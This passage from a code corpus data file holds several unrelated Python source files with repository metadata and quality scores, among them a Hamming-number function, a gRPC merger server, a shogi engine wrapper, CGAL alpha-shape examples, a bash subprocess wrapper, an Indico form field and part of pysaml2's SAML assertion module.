    wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16",
    bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
2.34375
2
Pset/hamming_numbers.py
MarkHershey/python-learning
9
1854
<reponame>MarkHershey/python-learning
def hamming(n):
    """Returns the nth hamming number"""
    hamming = {1}
    x = 1
    while len(hamming) <= n * 3.5:
        new_hamming = {1}
        for i in hamming:
            new_hamming.add(i * 2)
            new_hamming.add(i * 3)
            new_hamming.add(i * 5)
        # merge new number into hamming set
        hamming = hamming.union(new_hamming)
    # sort once generation is done; sorting inside the loop would turn the
    # set into a list and break the .union call on the next iteration
    hamming = sorted(list(hamming))
    return hamming[n - 1]


print(hamming(970))

# hamming(968) should be 41943040
# hamming(969) should be 41990400
# hamming(970) should be 42187500
4.375
4
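Spot checks for hamming against the known start of the 5-smooth sequence (1, 2, 3, 4, 5, 6, 8, 9, 10, 12, ...), assuming the function above:

assert hamming(1) == 1
assert hamming(7) == 8
assert hamming(10) == 12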
examples/run_merger.py
needlehaystack/needlestack
3
1855
import logging

from grpc_health.v1 import health_pb2, health_pb2_grpc
from grpc_health.v1.health import HealthServicer

from needlestack.apis import servicers_pb2_grpc
from needlestack.servicers import factory
from needlestack.servicers.merger import MergerServicer

from examples import configs

logging.getLogger("kazoo").setLevel("WARN")


def main():
    config = configs.LocalDockerConfig()

    server = factory.create_server(config)
    manager = factory.create_zookeeper_cluster_manager(config)
    manager.startup()

    servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)

    health = HealthServicer()
    health_pb2_grpc.add_HealthServicer_to_server(health, server)
    health.set("Merger", health_pb2.HealthCheckResponse.SERVING)

    factory.serve(server)


if __name__ == "__main__":
    main()
1.8125
2
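Once the merger is serving, the health status set above can be queried with the stock gRPC health client; a sketch assuming the server listens on localhost:50051 (the address is an assumption, not taken from the record):

import grpc
from grpc_health.v1 import health_pb2, health_pb2_grpc

channel = grpc.insecure_channel("localhost:50051")
stub = health_pb2_grpc.HealthStub(channel)
response = stub.Check(health_pb2.HealthCheckRequest(service="Merger"))
assert response.status == health_pb2.HealthCheckResponse.SERVING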
engine_wrapper.py
lidevelopers/Lishogi-Bot-1
0
1856
<filename>engine_wrapper.py<gh_stars>0
import os
import shogi
import backoff
import subprocess

from util import *

import logging

logger = logging.getLogger(__name__)

import engine_ctrl


@backoff.on_exception(backoff.expo, BaseException, max_time=120)
def create_engine(config, board):
    cfg = config["engine"]
    engine_path = os.path.realpath(os.path.join(cfg["dir"], cfg["name"]))
    engine_type = cfg.get("protocol")
    engine_options = cfg.get("engine_options")
    commands = [engine_path]
    if engine_options:
        for k, v in engine_options.items():
            commands.append("--{}={}".format(k, v))

    silence_stderr = cfg.get("silence_stderr", False)

    return USIEngine(board, commands, cfg.get("usi_options", {}), cfg.get("go_commands", {}), silence_stderr)


class EngineWrapper:
    def __init__(self, board, commands, options=None, silence_stderr=False):
        pass

    def search_for(self, board, movetime):
        pass

    def first_search(self, board, movetime):
        pass

    def search(self, game, board, btime, wtime, binc, winc):
        pass

    def print_stats(self):
        pass

    def get_opponent_info(self, game):
        pass

    def name(self):
        return self.engine.name

    def report_game_result(self, game, board):
        pass

    def quit(self):
        self.engine.kill_process()

    def print_handler_stats(self):
        pass

    def get_handler_stats(self):
        pass


class USIEngine(EngineWrapper):
    def __init__(self, board, commands, options, go_commands={}, silence_stderr=False):
        commands = commands[0] if len(commands) == 1 else commands
        self.go_commands = go_commands

        self.engine = engine_ctrl.Engine(commands)
        self.engine.usi()

        if options:
            for name, value in options.items():
                self.engine.setoption(name, value)

        self.engine.isready()

    def first_search(self, board, movetime):
        best_move, _ = self.engine.go(board.sfen(), "", movetime=movetime)
        return best_move

    def search_with_ponder(self, game, board, btime, wtime, binc, winc, byo, ponder=False):
        moves = [m.usi() for m in list(board.move_stack)]
        cmds = self.go_commands
        if len(cmds) > 0:
            best_move, ponder_move = self.engine.go(
                game.initial_fen,
                moves,
                nodes=cmds.get("nodes"),
                depth=cmds.get("depth"),
                movetime=cmds.get("movetime"),
                ponder=ponder
            )
        else:
            best_move, ponder_move = self.engine.go(
                game.initial_fen,
                moves,
                btime=btime,
                wtime=wtime,
                binc=binc,
                winc=winc,
                byo=byo,
                ponder=ponder
            )
        return (best_move, ponder_move)

    def search(self, game, board, btime, wtime, binc, winc):
        cmds = self.go_commands
        moves = [m.usi() for m in list(board.move_stack)]
        best_move, _ = self.engine.go(
            game.initial_fen,
            moves,
            btime=btime,
            wtime=wtime,
            binc=binc,
            winc=winc,
            depth=cmds.get("depth"),
            nodes=cmds.get("nodes"),
            movetime=cmds.get("movetime")
        )
        return best_move

    def stop(self):
        self.engine.kill_process()

    def print_stats(self, stats=None):
        if stats is None:
            stats = ['score', 'depth', 'nodes', 'nps']
        info = self.engine.info
        for stat in stats:
            if stat in info:
                logger.info("{}: {}".format(stat, info[stat]))

    def get_stats(self, stats=None):
        if stats is None:
            stats = ['score', 'depth', 'nodes', 'nps']
        info = self.engine.info
        stats_str = []
        for stat in stats:
            if stat in info:
                stats_str.append("{}: {}".format(stat, info[stat]))
        return stats_str

    def get_opponent_info(self, game):
        name = game.opponent.name
        if name:
            rating = game.opponent.rating if game.opponent.rating is not None else "none"
            title = game.opponent.title if game.opponent.title else "none"
            player_type = "computer" if title == "BOT" else "human"

    def report_game_result(self, game, board):
        self.engine.protocol._position(board)
2.234375
2
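create_engine retries on failure through the backoff decorator; its behavior, shown on a hypothetical flaky function (the function and exception type are illustrative):

import backoff

attempts = []

@backoff.on_exception(backoff.expo, RuntimeError, max_tries=3)
def flaky():
    attempts.append(1)
    if len(attempts) < 3:
        raise RuntimeError("engine not ready yet")
    return "ok"

# The first two calls raise and are retried with exponential delays.
assert flaky() == "ok" and len(attempts) == 3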
examples/python/test_as2.py
sloriot/cgal-swig-bindings
0
1857
from CGAL.CGAL_Kernel import Point_2
from CGAL.CGAL_Kernel import Weighted_point_2
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2
from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle
from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle
from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3

lst = []
lst.append(Point_2(0, 0))
lst.append(Point_2(0, 4))
lst.append(Point_2(44, 0))
lst.append(Point_2(44, 5))
lst.append(Point_2(444, 51))
lst.append(Point_2(14, 1))

t = Alpha_shape_2(lst, 0, GENERAL)
t2 = Alpha_shape_2(lst, 0)

t.clear()
t.make_alpha_shape(lst)

for d in t.alpha():
    print(d)

for v in t.finite_vertices():
    type = t.classify(v)
    print(v.get_range()[0])
    if type == INTERIOR:
        print("INTERIOR")
    elif type == SINGULAR:
        print("SINGULAR")
    elif type == REGULAR:
        print("REGULAR")
    elif type == EXTERIOR:
        print("EXTERIOR")

for f in t.finite_faces():
    i = f.get_ranges(0)
    print(i.first)
    print(i.second)
    print(i.third)

was = Weighted_alpha_shape_2()
lst_wp = []

lst_wp.append(Weighted_point_2(Point_2(0, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(0, 4), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 0), 1))
lst_wp.append(Weighted_point_2(Point_2(44, 5), 1))
lst_wp.append(Weighted_point_2(Point_2(444, 51), 1))
lst_wp.append(Weighted_point_2(Point_2(14, 1), 1))

was.make_alpha_shape(lst_wp)
2.328125
2
connections/mode.py
pavithra-mahamani/TAF
0
1858
<reponame>pavithra-mahamani/TAF
'''
Created on Jan 18, 2018

@author: riteshagarwal
'''

java = False
rest = False
cli = False
1.078125
1
scene_action2.py
encela95dus/ios_pythonista_examples
36
1859
import scene


class MyScene(scene.Scene):
    def setup(self):
        self.label_node = scene.LabelNode('A',
            position=(100, 400), parent=self)
        self.start_flag = False

    def update(self):
        if self.start_flag:
            x, y = self.label_node.position
            if x < 340:
                self.label_node.position = (x + 2, y)
            else:
                self.start_flag = False

    def touch_ended(self, touch):
        self.start_flag = True


scene.run(MyScene())
3.09375
3
bot/commands/disconnect.py
aq1/vkPostman
1
1860
from bot.commands import BaseCommand
import mongo


class DisconnectCommand(BaseCommand):
    _COMMAND = 'disconnect'
    _DESCRIPTION = 'Close currently active chat.'
    _SUCCESS_MESSAGE = 'Disconnected from chat'

    def _callback(self, user, _bot, update, **kwargs):
        return self._call(user, _bot, update, **kwargs)

    def _call(self, user, _bot, update, **kwargs):
        chat = mongo.chats.get_active_chat_by_telegram_id(user.id)
        if chat:
            mongo.chats.disable_chat(chat['_id'])
            return True

        _bot.send_message(
            user.id,
            'You are not connected to any vk user',
        )
        return False
2.421875
2
pysh/bash_vm/shell_command.py
JordanKoeller/Pysch
0
1861
<reponame>JordanKoeller/Pysch
from __future__ import annotations

import subprocess
import os

from typing import List, Dict, Iterator, Optional, Tuple


class ShellCommand:

    def __init__(self, cmd: str):
        self.run_args = [
            "bash",
            "-c",
            f'{cmd}'
        ]
        # self.run_args: List[str] = [executable, *args]

    def exec(self, **extra_environ: str) -> ShellCommandOutput:
        result = subprocess.run(
            self.run_args,
            stdout=subprocess.PIPE,
            env={
                **os.environ,
                **(extra_environ if extra_environ else {})
            }
        )
        print("Finished shell command")
        return ShellCommandOutput(str(result.stdout, 'utf-8'), result.returncode)


class ShellCommandOutput:
    def __init__(self, output_body: str, code: int):
        self._code = code
        self._value = output_body

    @property
    def succeeded(self) -> bool:
        return self._code == 0

    @property
    def code(self) -> int:
        return self._code

    @property
    def value(self) -> str:
        return self._value

    def lines(self) -> List[ShellCommandOutput]:
        return [
            ShellCommandOutput(substr, self.code)
            for substr in self.value.splitlines()
            if substr
        ]

    def __iter__(self) -> Iterator[str]:
        return iter(self._split_tokens())

    def __str__(self) -> str:
        return f'<STDOUT value={self.value} code={self.code} >'

    def _split_tokens(self) -> List[str]:
        ret = []
        in_quotes = None
        accumulator: List[str] = []
        for char in self.value:
            if _whitespace(char) and not in_quotes:
                # Separator whitespace: flush the pending token, if any, and
                # swallow the space. (The original only handled this case when
                # the accumulator was non-empty, so separator spaces leaked
                # into the start of the next token.)
                if accumulator:
                    ret.append(''.join(accumulator))
                    accumulator = []
            elif in_quotes is None and _quotes(char):
                in_quotes = char
            elif in_quotes and in_quotes == char:
                in_quotes = None
                if accumulator:
                    ret.append(''.join(accumulator))
                    accumulator = []
            elif in_quotes and _quotes(char):
                raise ValueError(
                    f"Found unmatched quote characters in string {self.value}")
            else:
                accumulator.append(char)
        # Flush the trailing token; the original dropped it when the output
        # did not end with whitespace.
        if accumulator:
            ret.append(''.join(accumulator))
        return ret


def _quotes(c: str) -> bool:
    return c in ['"', "'"]


def _whitespace(c: str) -> bool:
    return str.isspace(c)
2.59375
3
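A usage sketch for ShellCommand, assuming a POSIX system with bash on PATH:

out = ShellCommand('echo "\'hello world\' 42"').exec()
assert out.succeeded
# separator whitespace is swallowed and quoted tokens stay together
assert list(out) == ["hello world", "42"]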
indico/web/forms/fields/protection.py
jgrigera/indico
1
1862
<reponame>jgrigera/indico<filename>indico/web/forms/fields/protection.py<gh_stars>1-10
# This file is part of Indico.
# Copyright (C) 2002 - 2020 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.

from __future__ import absolute_import, unicode_literals

from flask import render_template
from markupsafe import Markup

from indico.core.db import db
from indico.core.db.sqlalchemy.protection import ProtectionMode
from indico.util.i18n import _
from indico.web.forms.fields import IndicoEnumRadioField
from indico.web.forms.widgets import JinjaWidget


class IndicoProtectionField(IndicoEnumRadioField):
    widget = JinjaWidget('forms/protection_widget.html', single_kwargs=True)
    radio_widget = JinjaWidget('forms/radio_buttons_widget.html', orientation='horizontal', single_kwargs=True)

    def __init__(self, *args, **kwargs):
        self.protected_object = kwargs.pop('protected_object')(kwargs['_form'])
        get_acl_message_url = kwargs.pop('acl_message_url', None)
        self.acl_message_url = get_acl_message_url(kwargs['_form']) if get_acl_message_url else None
        self.can_inherit_protection = self.protected_object.protection_parent is not None
        if not self.can_inherit_protection:
            kwargs['skip'] = {ProtectionMode.inheriting}
        super(IndicoProtectionField, self).__init__(*args, enum=ProtectionMode, **kwargs)

    def render_protection_message(self):
        protected_object = self.get_form().protected_object
        if hasattr(protected_object, 'get_non_inheriting_objects'):
            non_inheriting_objects = protected_object.get_non_inheriting_objects()
        else:
            non_inheriting_objects = []
        if isinstance(protected_object.protection_parent, db.m.Event):
            parent_type = _('Event')
        elif isinstance(protected_object.protection_parent, db.m.Category):
            parent_type = _('Category')
        else:
            parent_type = _('Session')
        rv = render_template('_protection_info.html', field=self, protected_object=protected_object,
                             parent_type=parent_type, non_inheriting_objects=non_inheriting_objects)
        return Markup(rv)
1.90625
2
src/saml2/saml.py
masterapps-au/pysaml2
0
1863
<reponame>masterapps-au/pysaml2 #!/usr/bin/env python # # Generated Mon May 2 14:23:33 2011 by parse_xsd.py version 0.4. # # A summary of available specifications can be found at: # https://wiki.oasis-open.org/security/FrontPage # # saml core specifications to be found at: # if any question arise please query the following pdf. # http://docs.oasis-open.org/security/saml/v2.0/saml-core-2.0-os.pdf # The specification was later updated with errata, and the new version is here: # https://www.oasis-open.org/committees/download.php/56776/sstc-saml-core-errata-2.0-wd-07.pdf # try: from base64 import encodebytes as b64encode except ImportError: from base64 import b64encode from saml2.validate import valid_ipv4, MustValueError from saml2.validate import valid_ipv6 from saml2.validate import ShouldValueError from saml2.validate import valid_domain_name import saml2 from saml2 import SamlBase import six from saml2 import xmldsig as ds from saml2 import xmlenc as xenc # authentication information fields NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:assertion' # xmlschema definition XSD = "xs" # xmlschema templates and extensions XS_NAMESPACE = 'http://www.w3.org/2001/XMLSchema' # xmlschema-instance, which contains several builtin attributes XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance' # xml soap namespace NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/" # type definitions for xmlschemas XSI_TYPE = '{%s}type' % XSI_NAMESPACE # nil type definition for xmlschemas XSI_NIL = '{%s}nil' % XSI_NAMESPACE # idp and sp communicate usually about a subject(NameID) # the format determines the category the subject is in # custom subject NAMEID_FORMAT_UNSPECIFIED = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified") # subject as email address NAMEID_FORMAT_EMAILADDRESS = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress") # subject as x509 key NAMEID_FORMAT_X509SUBJECTNAME = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:X509SubjectName") # subject as windows domain name NAMEID_FORMAT_WINDOWSDOMAINQUALIFIEDNAME = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:WindowsDomainQualifiedName") # subject from a kerberos instance NAMEID_FORMAT_KERBEROS = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:kerberos") # subject as name NAMEID_FORMAT_ENTITY = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:entity") # linked subject NAMEID_FORMAT_PERSISTENT = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent") # annonymous subject NAMEID_FORMAT_TRANSIENT = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:transient") # subject avaiable in encrypted format NAMEID_FORMAT_ENCRYPTED = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:encrypted") # dicc for avaiable formats NAMEID_FORMATS_SAML2 = ( ('NAMEID_FORMAT_EMAILADDRESS', NAMEID_FORMAT_EMAILADDRESS), ('NAMEID_FORMAT_ENCRYPTED', NAMEID_FORMAT_ENCRYPTED), ('NAMEID_FORMAT_ENTITY', NAMEID_FORMAT_ENTITY), ('NAMEID_FORMAT_PERSISTENT', NAMEID_FORMAT_PERSISTENT), ('NAMEID_FORMAT_TRANSIENT', NAMEID_FORMAT_TRANSIENT), ('NAMEID_FORMAT_UNSPECIFIED', NAMEID_FORMAT_UNSPECIFIED), ) # a profile outlines a set of rules describing how to embed SAML assertions. 
# https://docs.oasis-open.org/security/saml/v2.0/saml-profiles-2.0-os.pdf # The specification was later updated with errata, and the new version is here: # https://www.oasis-open.org/committees/download.php/56782/sstc-saml-profiles-errata-2.0-wd-07.pdf # XML based values for SAML attributes PROFILE_ATTRIBUTE_BASIC = ( "urn:oasis:names:tc:SAML:2.0:profiles:attribute:basic") # an AuthnRequest is made to initiate authentication # authenticate the request with login credentials AUTHN_PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password" # authenticate the request with login credentials, over tls/https AUTHN_PASSWORD_PROTECTED = \ "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport" # attribute statements is key:value metadata shared with your app # custom format NAME_FORMAT_UNSPECIFIED = ( "urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified") # uri format NAME_FORMAT_URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri" # XML-based format NAME_FORMAT_BASIC = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic" # dicc for avaiable formats NAME_FORMATS_SAML2 = ( ('NAME_FORMAT_BASIC', NAME_FORMAT_BASIC), ('NAME_FORMAT_URI', NAME_FORMAT_URI), ('NAME_FORMAT_UNSPECIFIED', NAME_FORMAT_UNSPECIFIED), ) # the SAML authority's decision can be predetermined by arbitrary context # the specified action is permitted DECISION_TYPE_PERMIT = "Permit" # the specified action is denied DECISION_TYPE_DENY = "Deny" # the SAML authority cannot determine if the action is permitted or denied DECISION_TYPE_INDETERMINATE = "Indeterminate" # consent attributes determine wether consent has been given and under # what conditions # no claim to consent is made CONSENT_UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified" # consent has been obtained CONSENT_OBTAINED = "urn:oasis:names:tc:SAML:2.0:consent:obtained" # consent has been obtained before the message has been initiated CONSENT_PRIOR = "urn:oasis:names:tc:SAML:2.0:consent:prior" # consent has been obtained implicitly CONSENT_IMPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-implicit" # consent has been obtained explicitly CONSENT_EXPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-explicit" # no consent has been obtained CONSENT_UNAVAILABLE = "urn:oasis:names:tc:SAML:2.0:consent:unavailable" # no consent is needed. CONSENT_INAPPLICABLE = "urn:oasis:names:tc:SAML:2.0:consent:inapplicable" # Subject confirmation methods(scm), can be issued, besides the subject itself # by third parties. # http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0.pdf # the 3rd party is identified on behalf of the subject given private/public key SCM_HOLDER_OF_KEY = "urn:oasis:names:tc:SAML:2.0:cm:holder-of-key" # the 3rd party is identified by subject confirmation and must include a security header # signing its content. SCM_SENDER_VOUCHES = "urn:oasis:names:tc:SAML:2.0:cm:sender-vouches" # a bearer token is issued instead. 
SCM_BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer" class AttributeValueBase(SamlBase): def __init__(self, text=None, extension_elements=None, extension_attributes=None): self._extatt = {} SamlBase.__init__(self, text=None, extension_elements=extension_elements, extension_attributes=extension_attributes) if self._extatt: self.extension_attributes = self._extatt if text: self.set_text(text) elif not extension_elements: self.extension_attributes = {XSI_NIL: 'true'} elif XSI_TYPE in self.extension_attributes: del self.extension_attributes[XSI_TYPE] def __setattr__(self, key, value): if key == "text": self.set_text(value) else: SamlBase.__setattr__(self, key, value) def verify(self): if not self.text and not self.extension_elements: if not self.extension_attributes: raise Exception( "Attribute value base should not have extension attributes" ) if self.extension_attributes[XSI_NIL] != "true": raise Exception( "Attribute value base should not have extension attributes" ) return True else: SamlBase.verify(self) def set_type(self, typ): try: del self.extension_attributes[XSI_NIL] except (AttributeError, KeyError): pass try: self.extension_attributes[XSI_TYPE] = typ except AttributeError: self._extatt[XSI_TYPE] = typ if typ.startswith('xs:'): try: self.extension_attributes['xmlns:xs'] = XS_NAMESPACE except AttributeError: self._extatt['xmlns:xs'] = XS_NAMESPACE if typ.startswith('xsd:'): try: self.extension_attributes['xmlns:xsd'] = XS_NAMESPACE except AttributeError: self._extatt['xmlns:xsd'] = XS_NAMESPACE def get_type(self): try: return self.extension_attributes[XSI_TYPE] except (KeyError, AttributeError): try: return self._extatt[XSI_TYPE] except KeyError: return "" def clear_type(self): try: del self.extension_attributes[XSI_TYPE] except KeyError: pass try: del self._extatt[XSI_TYPE] except KeyError: pass def set_text(self, value, base64encode=False): def _wrong_type_value(xsd, value): msg = 'Type and value do not match: {xsd}:{type}:{value}' msg = msg.format(xsd=xsd, type=type(value), value=value) raise ValueError(msg) # only work with six.string_types _str = unicode if six.PY2 else str if isinstance(value, six.binary_type): value = value.decode('utf-8') type_to_xsd = { _str: 'string', int: 'integer', float: 'float', bool: 'boolean', type(None): '', } # entries of xsd-types each declaring: # - a corresponding python type # - a function to turn a string into that type # - a function to turn that type into a text-value xsd_types_props = { 'string': { 'type': _str, 'to_type': _str, 'to_text': _str, }, 'integer': { 'type': int, 'to_type': int, 'to_text': _str, }, 'short': { 'type': int, 'to_type': int, 'to_text': _str, }, 'int': { 'type': int, 'to_type': int, 'to_text': _str, }, 'long': { 'type': int, 'to_type': int, 'to_text': _str, }, 'float': { 'type': float, 'to_type': float, 'to_text': _str, }, 'double': { 'type': float, 'to_type': float, 'to_text': _str, }, 'boolean': { 'type': bool, 'to_type': lambda x: { 'true': True, 'false': False, }[_str(x).lower()], 'to_text': lambda x: _str(x).lower(), }, 'base64Binary': { 'type': _str, 'to_type': _str, 'to_text': ( lambda x: b64encode(x.encode()) if base64encode else x ), }, 'anyType': { 'type': type(value), 'to_type': lambda x: x, 'to_text': lambda x: x, }, '': { 'type': type(None), 'to_type': lambda x: None, 'to_text': lambda x: '', }, } xsd_string = ( 'base64Binary' if base64encode else self.get_type() or type_to_xsd.get(type(value))) xsd_ns, xsd_type = ( ['', type(None)] if xsd_string is None else ['', ''] if xsd_string == '' else [ XSD if 
xsd_string in xsd_types_props else '', xsd_string ] if ':' not in xsd_string else xsd_string.split(':', 1)) xsd_type_props = xsd_types_props.get(xsd_type, {}) valid_type = xsd_type_props.get('type', type(None)) to_type = xsd_type_props.get('to_type', str) to_text = xsd_type_props.get('to_text', str) # cast to correct type before type-checking if type(value) is _str and valid_type is not _str: try: value = to_type(value) except (TypeError, ValueError, KeyError): # the cast failed _wrong_type_value(xsd=xsd_type, value=value) if type(value) is not valid_type: _wrong_type_value(xsd=xsd_type, value=value) text = to_text(value) self.set_type( '{ns}:{type}'.format(ns=xsd_ns, type=xsd_type) if xsd_ns else xsd_type if xsd_type else '') SamlBase.__setattr__(self, 'text', text) return self def harvest_element_tree(self, tree): # Fill in the instance members from the contents of the XML tree. for child in tree: self._convert_element_tree_to_member(child) for attribute, value in iter(tree.attrib.items()): self._convert_element_attribute_to_member(attribute, value) # if we have added children to this node # we consider whitespace insignificant # and remove/trim/strip whitespace # and expect to not have actual text content text = ( tree.text.strip() if tree.text and self.extension_elements else tree.text ) if text: #print("set_text:", tree.text) # clear type #self.clear_type() self.set_text(text) # if we have added a text node # or other children to this node # remove the nil marker if text or self.extension_elements: if XSI_NIL in self.extension_attributes: del self.extension_attributes[XSI_NIL] class BaseIDAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:BaseIDAbstractType element """ c_tag = 'BaseIDAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NameQualifier'] = ('name_qualifier', 'string', False) c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False) def __init__(self, name_qualifier=None, sp_name_qualifier=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.name_qualifier = name_qualifier self.sp_name_qualifier = sp_name_qualifier class NameIDType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:NameIDType element """ c_tag = 'NameIDType' c_namespace = NAMESPACE c_value_type = {'base': 'string'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NameQualifier'] = ('name_qualifier', 'string', False) c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False) c_attributes['Format'] = ('format', 'anyURI', False) c_attributes['SPProvidedID'] = ('sp_provided_id', 'string', False) def __init__(self, name_qualifier=None, sp_name_qualifier=None, format=None, sp_provided_id=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.name_qualifier = name_qualifier self.sp_name_qualifier = sp_name_qualifier self.format = format self.sp_provided_id = sp_provided_id def name_id_type__from_string(xml_string): return saml2.create_class_from_xml_string(NameIDType_, xml_string) class 
EncryptedElementType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedElementType element """ c_tag = 'EncryptedElementType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedData'] = ( 'encrypted_data', xenc.EncryptedData) c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedKey'] = ( 'encrypted_key', [xenc.EncryptedKey]) c_cardinality['encrypted_key'] = {"min": 0} c_child_order.extend(['encrypted_data', 'encrypted_key']) def __init__(self, encrypted_data=None, encrypted_key=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.encrypted_data = encrypted_data self.encrypted_key = encrypted_key or [] def encrypted_element_type__from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedElementType_, xml_string) class EncryptedID(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedID element """ c_tag = 'EncryptedID' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_id_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedID, xml_string) class Issuer(NameIDType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Issuer element """ c_tag = 'Issuer' c_namespace = NAMESPACE c_children = NameIDType_.c_children.copy() c_attributes = NameIDType_.c_attributes.copy() c_child_order = NameIDType_.c_child_order[:] c_cardinality = NameIDType_.c_cardinality.copy() def issuer_from_string(xml_string): return saml2.create_class_from_xml_string(Issuer, xml_string) class AssertionIDRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AssertionIDRef element """ c_tag = 'AssertionIDRef' c_namespace = NAMESPACE c_value_type = {'base': 'NCName'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def assertion_id_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AssertionIDRef, xml_string) class AssertionURIRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AssertionURIRef element """ c_tag = 'AssertionURIRef' c_namespace = NAMESPACE c_value_type = {'base': 'anyURI'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def assertion_uri_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AssertionURIRef, xml_string) class SubjectConfirmationDataType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationDataType element """ c_tag = 'SubjectConfirmationDataType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NotBefore'] = ('not_before', 'dateTime', False) c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False) c_attributes['Recipient'] = ('recipient', 'anyURI', False) c_attributes['InResponseTo'] = 
('in_response_to', 'NCName', False) c_attributes['Address'] = ('address', 'string', False) c_any = {"namespace": "##any", "processContents": "lax", "minOccurs": "0", "maxOccurs": "unbounded"} c_any_attribute = {"namespace": "##other", "processContents": "lax"} def __init__(self, not_before=None, not_on_or_after=None, recipient=None, in_response_to=None, address=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.not_before = not_before self.not_on_or_after = not_on_or_after self.recipient = recipient self.in_response_to = in_response_to self.address = address def subject_confirmation_data_type__from_string(xml_string): return saml2.create_class_from_xml_string(SubjectConfirmationDataType_, xml_string) class KeyInfoConfirmationDataType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:KeyInfoConfirmationDataType element """ c_tag = 'KeyInfoConfirmationDataType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info', [ds.KeyInfo]) c_cardinality['key_info'] = {"min": 1} c_child_order.extend(['key_info']) def __init__(self, key_info=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.key_info = key_info or [] def key_info_confirmation_data_type__from_string(xml_string): return 